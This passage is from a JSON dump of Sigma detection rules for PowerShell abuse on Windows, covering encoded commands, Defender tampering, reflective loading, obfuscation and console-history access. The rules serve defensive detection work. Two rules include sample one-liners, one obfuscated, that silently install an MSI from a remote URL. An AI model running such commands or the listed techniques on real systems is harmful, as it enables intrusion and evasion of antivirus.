    "content": "title: PowerShell Base64 Encoded Invoke Keyword\nid: 6385697e-9f1b-40bd-8817-f4a91f40508e\nrelated:\n    - id: fd6e2919-3936-40c9-99db-0aa922c356f7\n      type: obsolete\nstatus: test\ndescription: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls\nreferences:\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nauthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t\ndate: 2022-05-20\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_enc:\n        CommandLine|contains: ' -e'\n    selection_cli_invoke:\n        CommandLine|contains:\n            # Invoke-\n            # UTF-16LE\n            - 'SQBuAHYAbwBrAGUALQ'\n            - 'kAbgB2AG8AawBlAC0A'\n            - 'JAG4AdgBvAGsAZQAtA'\n            # UTF-8\n            - 'SW52b2tlL'\n            - 'ludm9rZS'\n            - 'JbnZva2Ut'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml",
    "content": "title: Powershell Base64 Encoded MpPreference Cmdlet\nid: c6fb44c6-71f5-49e6-9462-1425d328aee3\nstatus: test\ndescription: Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://twitter.com/AdamTheAnalyst/status/1483497517119590403\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-04\nmodified: 2023-01-30\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|base64offset|contains:\n              - 'Add-MpPreference '\n              - 'Set-MpPreference '\n              - 'add-mppreference '\n              - 'set-mppreference '\n        - CommandLine|contains:\n              # UTF16-LE\n              - 'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'\n              - 'EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'\n              - 'BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'\n              - 'UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'\n              - 'MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'\n              - 'TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'\n              - 'YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'\n              - 'EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'\n              - 'hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'\n              - 'cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'\n              - 'MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'\n              - 'zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml",
    "content": "title: PowerShell Base64 Encoded Reflective Assembly Load\nid: 62b7ccc9-23b4-471e-aa15-6da3663c4d59\nrelated:\n    - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1\n      type: similar\nstatus: test\ndescription: Detects base64 encoded .NET reflective loading of Assembly\nreferences:\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nauthor: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)\ndate: 2022-03-01\nmodified: 2023-01-30\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.t1620\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # [Reflection.Assembly]::Load(\n            - 'WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA'\n            - 'sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA'\n            - 'bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA'\n            # [reflection.assembly]::(\"Load\")\n            - 'AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC'\n            - 'BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp'\n            - 'AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK'\n            # [Reflection.Assembly]::(\"Load\")\n            - 'WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ'\n            - 'sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA'\n            - 'bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA'\n            # [reflection.assembly]::Load(\n            - 'WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA'\n      
      - 'sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA'\n            - 'bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml",
    "content": "title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call\nid: 9c0295ce-d60d-40bd-bd74-84673b7592b1\nrelated:\n    - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59\n      type: similar\nstatus: test\ndescription: Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"\nreferences:\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\n    - https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0\nauthor: pH-T (Nextron Systems)\ndate: 2022-03-01\nmodified: 2023-04-06\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.001\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # ::(\"L\"+\"oad\")\n            - 'OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ'\n            - 'oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA'\n            - '6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA'\n            # ::(\"Lo\"+\"ad\")\n            - 'OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ'\n            - 'oAOgAoACIATABvACIAKwAiAGEAZAAiACkA'\n            - '6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA'\n            # ::(\"Loa\"+\"d\")\n            - 'OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ'\n            - 'oAOgAoACIATABvAGEAIgArACIAZAAiACkA'\n            - '6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA'\n            # ::('L'+'oad')\n            - 'OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ'\n            - 'oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA'\n            - '6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA'\n            # ::('Lo'+'ad')\n            - 'OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ'\n            - 'oAOgAoACcATABvACcAKwAnAGEAZAAnACkA'\n            - '6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA'\n            # ::('Loa'+'d')\n            - 'OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ'\n            - 
'oAOgAoACcATABvAGEAJwArACcAZAAnACkA'\n            - '6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml",
    "content": "title: PowerShell Base64 Encoded WMI Classes\nid: 1816994b-42e1-4fb1-afd2-134d88184f71\nrelated:\n    - id: 47688f1b-9f51-4656-b013-3cc49a166a36\n      type: obsolete\nstatus: test\ndescription: Detects calls to base64 encoded WMI class such as \"Win32_ShadowCopy\", \"Win32_ScheduledJob\", etc.\nreferences:\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar\nauthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-30\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli_shadowcopy:\n        # Win32_ShadowCopy\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ'\n            - 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA'\n            - 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A'\n            - 'V2luMzJfU2hhZG93Y29we'\n            - 'dpbjMyX1NoYWRvd2NvcH'\n            - 'XaW4zMl9TaGFkb3djb3B5'\n    selection_cli_scheduledJob:\n        # Win32_ScheduledJob\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA'\n            - 'cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA'\n            - 'XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg'\n            - 'V2luMzJfU2NoZWR1bGVkSm9i'\n            - 'dpbjMyX1NjaGVkdWxlZEpvY'\n            - 'XaW4zMl9TY2hlZHVsZWRKb2'\n    selection_cli_process:\n        # Win32_Process\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw'\n            - 'cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA'\n            - 'XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA'\n            - 
'V2luMzJfUHJvY2Vzc'\n            - 'dpbjMyX1Byb2Nlc3'\n            - 'XaW4zMl9Qcm9jZXNz'\n    selection_cli_useraccount:\n        # Win32_UserAccount\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A'\n            - 'cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA'\n            - 'XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA'\n            - 'V2luMzJfVXNlckFjY291bn'\n            - 'dpbjMyX1VzZXJBY2NvdW50'\n            - 'XaW4zMl9Vc2VyQWNjb3Vud'\n    selection_cli_loggedonuser:\n        # Win32_LoggedOnUser\n        CommandLine|contains:\n            - 'VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA'\n            - 'cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA'\n            - 'XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg'\n            - 'V2luMzJfTG9nZ2VkT25Vc2Vy'\n            - 'dpbjMyX0xvZ2dlZE9uVXNlc'\n            - 'XaW4zMl9Mb2dnZWRPblVzZX'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml",
    "content": "title: Potential Process Execution Proxy Via CL_Invocation.ps1\nid: a0459f02-ac51-4c09-b511-b8c9203fc429\nstatus: test\ndescription: Detects calls to \"SyncInvoke\" that is part of the \"CL_Invocation.ps1\" script to proxy execution using \"System.Diagnostics.Process\"\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/\n    - https://twitter.com/bohops/status/948061991012327424\nauthor: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova\ndate: 2020-10-14\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via \"-Command\" or \"-ScriptBlock\" flags for example.\n        CommandLine|contains: 'SyncInvoke '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml",
    "content": "title: Assembly Loading Via CL_LoadAssembly.ps1\nid: c57872c7-614f-4d7f-a40d-b78c8df2d30d\nstatus: test\ndescription: Detects calls to \"LoadAssemblyFromPath\" or \"LoadAssemblyFromNS\" that are part of the \"CL_LoadAssembly.ps1\" script. This can be abused to load different assemblies and bypass App locker controls.\nreferences:\n    - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\n    - https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-21\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via \"-Command\" or \"-ScriptBlock\" flags for example.\n        CommandLine|contains:\n            - 'LoadAssemblyFromPath '\n            - 'LoadAssemblyFromNS '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml",
    "content": "title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1\nid: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d\nstatus: test\ndescription: Detects the use of the Microsoft signed script \"CL_mutexverifiers\" to proxy the execution of additional PowerShell script commands\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/\nauthor: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113\ndate: 2022-05-21\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pwsh:\n        ParentImage|endswith:\n            # Note: to avoid potential FPs we assume the script was launched from powershell. But in theory it can be launched by any Powershell like process\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\powershell.exe'\n        CommandLine|contains: ' -nologo -windowstyle minimized -file '\n    selection_temp:\n        # Note: Since the function uses \"env:temp\" the value will change depending on the context of exec\n        CommandLine|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml",
    "content": "title: ConvertTo-SecureString Cmdlet Usage Via CommandLine\nid: 74403157-20f5-415d-89a7-c505779585cf\nstatus: test\ndescription: Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton\ndate: 2020-10-11\nmodified: 2023-02-01\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains: 'ConvertTo-SecureString'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use to pass password to different powershell commands\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml",
    "content": "title: Potential PowerShell Obfuscation Via Reversed Commands\nid: b6b49cd1-34d6-4ead-b1bf-176e9edba9a4\nstatus: test\ndescription: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers\nreferences:\n    - https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton\ndate: 2020-10-11\nmodified: 2023-05-31\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains:\n            - 'hctac'\n            - 'kaerb'\n            - 'dnammoc'\n            - 'ekovn' # Also covers 'ekovni'\n            - 'eliFd'\n            - 'rahc'\n            - 'etirw'\n            - 'golon'\n            - 'tninon'\n            - 'eddih'\n            - 'tpircS'\n            - 'ssecorp'\n            - 'llehsrewop'\n            - 'esnopser'\n            - 'daolnwod'\n            - 'tneilCbeW'\n            - 'tneilc'\n            - 'ptth'\n            - 'elifotevas'\n            - '46esab'\n            - 'htaPpmeTteG'\n            - 'tcejbO'\n            - 'maerts'\n            - 'hcaerof'\n            - 'retupmoc'\n    filter_main_encoded_keyword:\n        # We exclude usage of encoded commands as they might generate FPs as shown here:\n        #   https://github.com/SigmaHQ/sigma/pull/2720\n        #   https://github.com/SigmaHQ/sigma/issues/4270\n        CommandLine|contains:\n            - ' -EncodedCommand '\n            - ' -enc '\n    condition: 
all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml",
    "content": "title: Potential PowerShell Command Line Obfuscation\nid: d7bcd677-645d-4691-a8d4-7a5602b780d1\nstatus: test\ndescription: Detects the PowerShell command lines with special characters\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64\nauthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)\ndate: 2020-10-15\nmodified: 2024-04-15\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_re:\n        # TODO: Optimize for PySIGMA\n        - CommandLine|re: '\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+'\n        - CommandLine|re: '\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{'\n        - CommandLine|re: '\\^.*\\^.*\\^.*\\^.*\\^'\n        - CommandLine|re: '`.*`.*`.*`.*`'\n    filter_optional_amazonSSM:\n        ParentImage: C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe\n    filter_optional_defender_atp:\n        CommandLine|contains:\n            - 'new EventSource(\"Microsoft.Windows.Sense.Client.Management\"'\n            - 'public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Amazon SSM Document Worker\n    - Windows Defender ATP\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_comobject_msi.yml",
    "content": "title: Obfuscated PowerShell MSI Install via WindowsInstaller COM\nid: 7b6a7418-3afc-11f0-aff4-000d3abf478c\nstatus: experimental\ndescription: |\n    Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).\n    The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting\n    malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection\n    by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with\n    hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.\nreferences:\n    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/\n    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/\n    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457\nauthor: Meroujan Antonyan (vx3r)\ndate: 2025-05-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027.010\n    - attack.t1218.007\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: \"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -W Hidden -C \"$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')\";\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n           
   - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-ComObject'\n            - 'InstallProduct('\n            - '.Insert('\n            - 'UILevel'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_comobject_msi_remote.yml",
    "content": "title: PowerShell MSI Install via WindowsInstaller COM From Remote Location\nid: 222720a7-047f-4054-baa5-bab9be757db0\nstatus: experimental\ndescription: |\n    Detects the execution of PowerShell commands that attempt to install MSI packages via the\n    Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.\n    This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.\n    And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.\nreferences:\n    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/\n    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/\n    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457\nauthor: Meroujan Antonyan (vx3r)\ndate: 2025-06-05\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: \"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe\" -W Hidden -C \"$u='https://example.com/';$i=New-Object -ComObject('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct($u),'')\";\n    selection_img:\n        - Image|endswith:\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - '-ComObject'\n            - 'InstallProduct('\n    selection_remote:\n        CommandLine|contains:\n            - 'http'\n            - '\\\\\\\\'\n    filter_main_localhost:\n        CommandLine|contains:\n            - '://127.0.0.1'\n     
       - '://localhost'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml",
    "content": "title: Computer Discovery And Export Via Get-ADComputer Cmdlet\nid: 435e10e4-992a-4281-96f3-38b11106adde\nrelated:\n    - id: db885529-903f-4c5d-9864-28fe199e6370\n      type: similar\nstatus: test\ndescription: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\n    - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-10\nmodified: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'Get-ADComputer '\n            - ' -Filter \\*'\n        CommandLine|contains:\n            - ' > '\n            - ' | Select '\n            - 'Out-File'\n            - 'Set-Content'\n            - 'Add-Content'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_console_history_file_access.yml",
    "content": "title: Potential PowerShell Console History Access Attempt via History File\nid: f4ff7323-b5fc-4323-8b52-6b9408e15788\nstatus: experimental\ndescription: |\n    Detects potential access attempts to the PowerShell console history directly via history file (ConsoleHost_history.txt).\n    This can give access to plaintext passwords used in PowerShell commands or used for general reconnaissance.\nreferences:\n    - https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html\nauthor: Luc Génaux\ndate: 2025-04-03\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'ConsoleHost_history.txt'\n            - '(Get-PSReadLineOption).HistorySavePath'\n    condition: selection\nfalsepositives:\n    - Legitimate access of the console history file is possible\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_create_service.yml",
    "content": "title: New Service Creation Using PowerShell\nid: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2\nrelated:\n    - id: 85ff530b-261d-48c6-a441-facaa2e81e48 # Using Sc.EXE\n      type: similar\nstatus: test\ndescription: Detects the creation of a new service using powershell.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2023-02-20\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'New-Service'\n            - '-BinaryPathName'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator or user creates a service for legitimate reasons.\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml",
